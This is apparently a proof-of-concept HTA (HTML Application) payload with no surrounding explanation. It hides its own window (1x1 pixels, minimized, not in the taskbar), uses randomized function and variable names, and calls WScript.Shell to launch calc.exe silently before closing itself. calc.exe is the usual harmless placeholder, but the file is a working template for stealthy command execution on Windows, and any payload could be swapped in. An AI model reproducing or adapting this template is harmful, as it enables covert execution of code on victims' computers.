<HTA:APPLICATION 
    BORDER="none"
    SHOWINTASKBAR="no"
    SYSMENU="no"
    WINDOWSTATE="minimize"
    WIDTH="1"
    HEIGHT="1"
/>

<script type="text/javascript">
    function otwjAFrc() {
        try {
            // Create an ActiveXObject to run a command using the WScript.Shell object
            var aJTzJMoE = new ActiveXObject("WScript.Shell");

            // Define the command to run the calculator
            var command = "calc.exe";

            // Run the command (0 means no window, false means don't wait for completion)
            aJTzJMoE.Run(command, 0, false);

            // Close the HTA window
            window.close();

        } catch (e) {
            alert("Error: " + e.message);
        }
    }

    // Call the function to execute the task
    otwjAFrc();
</script>
